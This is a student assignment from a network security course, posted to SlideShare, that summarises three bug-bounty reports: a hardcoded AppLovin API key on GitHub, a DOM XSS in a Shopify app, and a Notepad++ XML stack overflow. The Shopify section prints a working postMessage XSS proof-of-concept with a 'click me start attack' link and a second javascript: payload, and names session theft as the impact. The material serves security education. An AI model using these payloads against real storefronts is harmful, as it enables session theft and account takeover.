SlideShare ist ein Scribd-Unternehmen logo

Assingment 3 - Bug bounty

Als DOCX, PDF herunterladen
J
Jeewanthi Fernando

Information and Network Security - INS

Technologie
1 von 8
Sri Lanka Institute of Information Technology Master of Science (Information Management) Degree Program Information and Network Security Assignment 3 Bug bounty W.M.J.H. Fernando MS18901290
2 AppLovin API Key hardcoded in a Github repo Theyfound SensitiveDataExposure ingithub/mopub-android-mediationproject,the AppLovinUIAPIkey ishardcodedinsource code. The mainimpactis productionAPIkeythenitshouldn'tbe shownpubliclyin Githubrepo otherwise itcan be used by otherdevelopersasit's a companypropertythe APIkeyshould be secure as it's a monetize API key. Thiskeyisusedfor initializationof the app, butAPIKeyshouldnotbe disclosedpubliclyinaGithubrepo. There are 2 perspective levels.  Developer perspective EveryAPI keyhas some certainusage limitandif otherdevelopersuse thissame keythenAPIkey usage limit will get reduced.  Attacker perspective Attacker can use this key to violate GDPR policy because from May 25th 2018 AppLovin compliant with GDPR and there are certainruleswhichneedtobe followedwhile buildingthe appandif an attacker got thiskeyhe will violate GDPRrulesandit will be a huge problem to the company. These are some links,  AppLovinGDPRpolicylink 1. https://www.applovin.com/privacy/ 2. https://www.applovin.com/gdprfaqs/  Mopub GDPR PublisherIntegrationGuide 1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
3  As perGoogle AppLovinSDKDocs,EUconsentand GDPR 1. https://developers.google.com/admob/android/mediation/applovin Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and consentsobtainedfrom,usersinthe EuropeanEconomicArea(EEA)regardingtheuseof deviceidentifiers andpersonal data.Thispolicyreflectsthe requirementsof the EUePrivacyDirectiveandthe GeneralData Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your mediation chain that may collect, receive, or use personal data and provide information about each network's use. Google currently is unable to pass the user's consent choice to such networks automatically. The best way committing the code to Github repo you shouldn't commit your application Key because you neverknowwhenthingswill gowrong,the API_KEY is alwayscompany propertyand it shouldn'tbe disclosed publicly.
4 DOM XSS via Shopify.API.remoteRedirect This problem foundadom xsson the apple-business-chatappthatseemsto be referringto a vulnerable js file. Foruserswho have installedthisapp,justlethimuse the theme code I providedtocomplete xss. Modify the theme code to the following payload. <script> function attack(){ let ctx=window.open('https://apple-business-chat- commerce.shopifycloud.com'),interval; let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.dom ain)`); interval=setInterval(()=>{ ctx && ctx.postMessage({ "message":"Shopify.API.remoteRedirect", "data":{ "location":`javascript:eval(atob('${payload}'))` } },location.origin); },500); window.onmessage=(e)=>{ e.data==="success"&&( console.log('attack success'), window.onmessage=null, clearInterval(interval) ); }; } attack(); </script> <a href="javascript:attack()" style="display:block;text- align:center;width:100%;height:300px;line- height:300px;background:#000;color:#fff;">click me start attack</a>
5 As shown below Then click on the store front page to trigger Impact Steal session information, add administrators, etc.
6 Another API is also affected by xss postMessage({ "message":"Shopify.API.Bar.initialize", "data":{ pagination: { next: { href: "javascript:alert(document.domain)", target: "new" }, previous: { href: "javascript:alert(document.domain)", target: "new" } } } });
7 Stack overflow in XML Parsing Summary: A stack bufferoverflowvulnerabilityhasbeendetectedinXMLparsingfunctionalityon Notepad++ v7.6.2 (32 bits). That's due to the fact that _ invisibleEditView.getTextfunctiondoesn'tcheckbufferboundaries. Description: Vulnerabilitysrcfile:notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp Vulnerabilityline:line1008 Variable affected:charencodingStr[128]; Functionthatoverflowsbuffer:_invisibleEditView.getText Stepsto Reproduce: 1. Create a .xml file withacorrect XML format 2. Introduce a bigXML fieldthatoverflows"encodingStr"buffer. 3. Openthe file withNotepad++andapplicationshouldcrash. Supporting Material/References:  BoF_example1.xml->Exploitexample Impact An attackercouldcreate a malicious.xml filethattriggersastack bufferoverflow onvictimmachine. You onlyneedtoopenattached.xml file examplewithNotepad++toreproduce the exploit.
8

Empfohlen

Using the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & FinanceUsing the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & Finance
Hitesh Sahu
 
API Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentestersAPI Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentesters
Inon Shkedy
 
React native - Under the Hood and App Live Updates without App Store Approval
React native - Under the Hood and App Live Updates without App Store ApprovalReact native - Under the Hood and App Live Updates without App Store Approval
React native - Under the Hood and App Live Updates without App Store Approval
Suresh Balla
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
42Crunch
 
Android - Getting Started With Firebase Auth
Android - Getting Started With Firebase AuthAndroid - Getting Started With Firebase Auth
Android - Getting Started With Firebase Auth
Bayu Firmawan Paoh
 
Magento eCommerce And The Next Generation Of PHP
Magento eCommerce And The Next Generation Of PHPMagento eCommerce And The Next Generation Of PHP
Magento eCommerce And The Next Generation Of PHP
varien
 
UaMobitech - App Links and App Indexing API
UaMobitech - App Links and App Indexing APIUaMobitech - App Links and App Indexing API
UaMobitech - App Links and App Indexing API
Matteo Bonifazi
 
AIR & API
AIR & APIAIR & API
AIR & API
Arie Prasetyo
 

Empfohlen

Using the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & FinanceUsing the Google SafetyNet API for Banking & Finance
Using the Google SafetyNet API for Banking & Finance
Hitesh Sahu
 
API Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentestersAPI Security - OWASP top 10 for APIs + tips for pentesters
API Security - OWASP top 10 for APIs + tips for pentesters
Inon Shkedy
 
React native - Under the Hood and App Live Updates without App Store Approval
React native - Under the Hood and App Live Updates without App Store ApprovalReact native - Under the Hood and App Live Updates without App Store Approval
React native - Under the Hood and App Live Updates without App Store Approval
Suresh Balla
 
WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10WEBINAR: OWASP API Security Top 10
WEBINAR: OWASP API Security Top 10
42Crunch
 
Android - Getting Started With Firebase Auth
Android - Getting Started With Firebase AuthAndroid - Getting Started With Firebase Auth
Android - Getting Started With Firebase Auth
Bayu Firmawan Paoh
 
Magento eCommerce And The Next Generation Of PHP
Magento eCommerce And The Next Generation Of PHPMagento eCommerce And The Next Generation Of PHP
Magento eCommerce And The Next Generation Of PHP
varien
 
UaMobitech - App Links and App Indexing API
UaMobitech - App Links and App Indexing APIUaMobitech - App Links and App Indexing API
UaMobitech - App Links and App Indexing API
Matteo Bonifazi
 
AIR & API
AIR & APIAIR & API
AIR & API
Arie Prasetyo
 
Sst hackathon express
Sst hackathon expressSst hackathon express
Sst hackathon express
Aeshan Wijetunge
 
Intro to PhoneGap
Intro to PhoneGapIntro to PhoneGap
Intro to PhoneGap
Ryan Stewart
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NoSuchCon
 
MacOS Mojave Security Issues
MacOS Mojave Security IssuesMacOS Mojave Security Issues
MacOS Mojave Security Issues
VitaliyMechytashvili
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
Shubham Gupta
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
Sandeep Joshi
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent Convento
DEVCON
 
Android mobile app security offensive security workshop
Android mobile app security offensive security workshopAndroid mobile app security offensive security workshop
Android mobile app security offensive security workshop
Abhinav Sejpal
 
How to build and deploy app on Replit
How to build and deploy app on ReplitHow to build and deploy app on Replit
How to build and deploy app on Replit
matiasfund
 
Android reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skypeAndroid reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skype
Mário Almeida
 
From Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in EssenceFrom Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in Essence
Satria Ady Pradana
 
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf
 
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti MohulCsa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Cloud Security Alliance, UK chapter
 
Understanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptxUnderstanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptx
Hexaview Technologies Inc.
 
From Reversing to Exploitation
From Reversing to ExploitationFrom Reversing to Exploitation
From Reversing to Exploitation
Satria Ady Pradana
 
July Patch Tuesday 2019
July Patch Tuesday 2019July Patch Tuesday 2019
July Patch Tuesday 2019
Ivanti
 
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
Jitendra Bafna
 
IRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security AssessmentIRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security Assessment
IRJET Journal
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulator
Prachi Singhal
 
Mobile Apps Develpment - A Comparison
Mobile Apps Develpment - A ComparisonMobile Apps Develpment - A Comparison
Mobile Apps Develpment - A Comparison
Lataant Software Technologies
 
Assingment 5 - ENSA
Assingment 5 - ENSAAssingment 5 - ENSA
Assingment 5 - ENSA
Jeewanthi Fernando
 
Assingment 4 - DDos
Assingment 4 - DDosAssingment 4 - DDos
Assingment 4 - DDos
Jeewanthi Fernando
 

Weitere ähnliche Inhalte

Ähnlich wie Assingment 3 - Bug bounty

Android mobile app security offensive security workshop
Android mobile app security offensive security workshopAndroid mobile app security offensive security workshop
Android mobile app security offensive security workshop
Abhinav Sejpal
 
Android reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skypeAndroid reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skype
Mário Almeida
 
Understanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptxUnderstanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptx
Hexaview Technologies Inc.
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulator
Prachi Singhal
 

Ähnlich wie Assingment 3 - Bug bounty (20)

Sst hackathon express
Sst hackathon expressSst hackathon express
Sst hackathon express
 
Intro to PhoneGap
Intro to PhoneGapIntro to PhoneGap
Intro to PhoneGap
 
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine SecurityNSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
NSC #2 - D2 03 - Nicolas Collignon - Google Apps Engine Security
 
MacOS Mojave Security Issues
MacOS Mojave Security IssuesMacOS Mojave Security Issues
MacOS Mojave Security Issues
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016
 
Android malware presentation
Android malware presentationAndroid malware presentation
Android malware presentation
 
Progressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent ConventoProgressive Web Apps by Millicent Convento
Progressive Web Apps by Millicent Convento
 
Android mobile app security offensive security workshop
Android mobile app security offensive security workshopAndroid mobile app security offensive security workshop
Android mobile app security offensive security workshop
 
How to build and deploy app on Replit
How to build and deploy app on ReplitHow to build and deploy app on Replit
How to build and deploy app on Replit
 
Android reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skypeAndroid reverse engineering - Analyzing skype
Android reverse engineering - Analyzing skype
 
From Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in EssenceFrom Reversing to Exploitation: Android Application Security in Essence
From Reversing to Exploitation: Android Application Security in Essence
 
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
idsecconf2023 - Aan Wahyu - Hide n seek with android app protections and beat...
 
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti MohulCsa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
Csa UK agm 2019 - Web API attacks - Trends seen in the field Kriti Mohul
 
Understanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptxUnderstanding ChatGPT and Its Implications.pptx
Understanding ChatGPT and Its Implications.pptx
 
From Reversing to Exploitation
From Reversing to ExploitationFrom Reversing to Exploitation
From Reversing to Exploitation
 
July Patch Tuesday 2019
July Patch Tuesday 2019July Patch Tuesday 2019
July Patch Tuesday 2019
 
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
MuleSoft Nashik Virtual Meetup#4 - Implementing CI/CD pipeline for deploying ...
 
IRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security AssessmentIRJET- Secure Android Application Development and Security Assessment
IRJET- Secure Android Application Development and Security Assessment
 
Secure visual algorithm simulator
Secure visual algorithm simulatorSecure visual algorithm simulator
Secure visual algorithm simulator
 
Mobile Apps Develpment - A Comparison
Mobile Apps Develpment - A ComparisonMobile Apps Develpment - A Comparison
Mobile Apps Develpment - A Comparison
 

Mehr von Jeewanthi Fernando

Mehr von Jeewanthi Fernando (20)

Assingment 5 - ENSA
Assingment 5 - ENSAAssingment 5 - ENSA
Assingment 5 - ENSA
 
Assingment 4 - DDos
Assingment 4 - DDosAssingment 4 - DDos
Assingment 4 - DDos
 
Assingment 2 - Law
Assingment 2 - LawAssingment 2 - Law
Assingment 2 - Law
 
Assingment 1 - Google haker
Assingment 1 - Google hakerAssingment 1 - Google haker
Assingment 1 - Google haker
 
Ob group presentation
Ob group presentationOb group presentation
Ob group presentation
 
OB group assignment
OB group assignmentOB group assignment
OB group assignment
 
Poster
PosterPoster
Poster
 
Assignment - Maliban
Assignment - MalibanAssignment - Maliban
Assignment - Maliban
 
Assignment 1
Assignment 1Assignment 1
Assignment 1
 
BPM presentation
BPM presentationBPM presentation
BPM presentation
 
Business Process Management Doc
Business Process Management DocBusiness Process Management Doc
Business Process Management Doc
 
Group assingment
Group assingmentGroup assingment
Group assingment
 
Class activity 5
Class activity 5 Class activity 5
Class activity 5
 
Class activity 4
Class activity 4 Class activity 4
Class activity 4
 
Class activity 3
Class activity 3 Class activity 3
Class activity 3
 
Professional networking
Professional networkingProfessional networking
Professional networking
 
Assignment 1
Assignment 1Assignment 1
Assignment 1
 
Tesco doc
Tesco docTesco doc
Tesco doc
 
Tesco
TescoTesco
Tesco
 
ALSS Assingment 1
ALSS Assingment 1ALSS Assingment 1
ALSS Assingment 1
 

Kürzlich hochgeladen

Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 

Kürzlich hochgeladen (20)

Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 

Assingment 3 - Bug bounty

  • 1. Sri Lanka Institute of Information Technology Master of Science (Information Management) Degree Program Information and Network Security Assignment 3 Bug bounty W.M.J.H. Fernando MS18901290
  • 2. 2 AppLovin API Key hardcoded in a Github repo Theyfound SensitiveDataExposure ingithub/mopub-android-mediationproject,the AppLovinUIAPIkey ishardcodedinsource code. The mainimpactis productionAPIkeythenitshouldn'tbe shownpubliclyin Githubrepo otherwise itcan be used by otherdevelopersasit's a companypropertythe APIkeyshould be secure as it's a monetize API key. Thiskeyisusedfor initializationof the app, butAPIKeyshouldnotbe disclosedpubliclyinaGithubrepo. There are 2 perspective levels.  Developer perspective EveryAPI keyhas some certainusage limitandif otherdevelopersuse thissame keythenAPIkey usage limit will get reduced.  Attacker perspective Attacker can use this key to violate GDPR policy because from May 25th 2018 AppLovin compliant with GDPR and there are certainruleswhichneedtobe followedwhile buildingthe appandif an attacker got thiskeyhe will violate GDPRrulesandit will be a huge problem to the company. These are some links,  AppLovinGDPRpolicylink 1. https://www.applovin.com/privacy/ 2. https://www.applovin.com/gdprfaqs/  Mopub GDPR PublisherIntegrationGuide 1. https://developers.mopub.com/publishers/best-practices/gdpr-guide/
  • 3. 3  As perGoogle AppLovinSDKDocs,EUconsentand GDPR 1. https://developers.google.com/admob/android/mediation/applovin Under the Google EU User Consent Policy, you must ensure that certain disclosures are given to, and consentsobtainedfrom,usersinthe EuropeanEconomicArea(EEA)regardingtheuseof deviceidentifiers andpersonal data.Thispolicyreflectsthe requirementsof the EUePrivacyDirectiveandthe GeneralData Protection Regulation (GDPR). When seeking consent, you must identify each ad network in your mediation chain that may collect, receive, or use personal data and provide information about each network's use. Google currently is unable to pass the user's consent choice to such networks automatically. The best way committing the code to Github repo you shouldn't commit your application Key because you neverknowwhenthingswill gowrong,the API_KEY is alwayscompany propertyand it shouldn'tbe disclosed publicly.
  • 4. 4 DOM XSS via Shopify.API.remoteRedirect This problem foundadom xsson the apple-business-chatappthatseemsto be referringto a vulnerable js file. Foruserswho have installedthisapp,justlethimuse the theme code I providedtocomplete xss. Modify the theme code to the following payload. <script> function attack(){ let ctx=window.open('https://apple-business-chat- commerce.shopifycloud.com'),interval; let payload=btoa(`window.opener.postMessage('success',location.origin);alert(document.dom ain)`); interval=setInterval(()=>{ ctx && ctx.postMessage({ "message":"Shopify.API.remoteRedirect", "data":{ "location":`javascript:eval(atob('${payload}'))` } },location.origin); },500); window.onmessage=(e)=>{ e.data==="success"&&( console.log('attack success'), window.onmessage=null, clearInterval(interval) ); }; } attack(); </script> <a href="javascript:attack()" style="display:block;text- align:center;width:100%;height:300px;line- height:300px;background:#000;color:#fff;">click me start attack</a>
  • 5. 5 As shown below Then click on the store front page to trigger Impact Steal session information, add administrators, etc.
  • 6. 6 Another API is also affected by xss postMessage({ "message":"Shopify.API.Bar.initialize", "data":{ pagination: { next: { href: "javascript:alert(document.domain)", target: "new" }, previous: { href: "javascript:alert(document.domain)", target: "new" } } } });
  • 7. 7 Stack overflow in XML Parsing Summary: A stack bufferoverflowvulnerabilityhasbeendetectedinXMLparsingfunctionalityon Notepad++ v7.6.2 (32 bits). That's due to the fact that _ invisibleEditView.getTextfunctiondoesn'tcheckbufferboundaries. Description: Vulnerabilitysrcfile:notepad-plus-plus/PowerEditor/src/Notepad_plus.cpp Vulnerabilityline:line1008 Variable affected:charencodingStr[128]; Functionthatoverflowsbuffer:_invisibleEditView.getText Stepsto Reproduce: 1. Create a .xml file withacorrect XML format 2. Introduce a bigXML fieldthatoverflows"encodingStr"buffer. 3. Openthe file withNotepad++andapplicationshouldcrash. Supporting Material/References:  BoF_example1.xml->Exploitexample Impact An attackercouldcreate a malicious.xml filethattriggersastack bufferoverflow onvictimmachine. You onlyneedtoopenattached.xml file examplewithNotepad++toreproduce the exploit.
  • 8. 8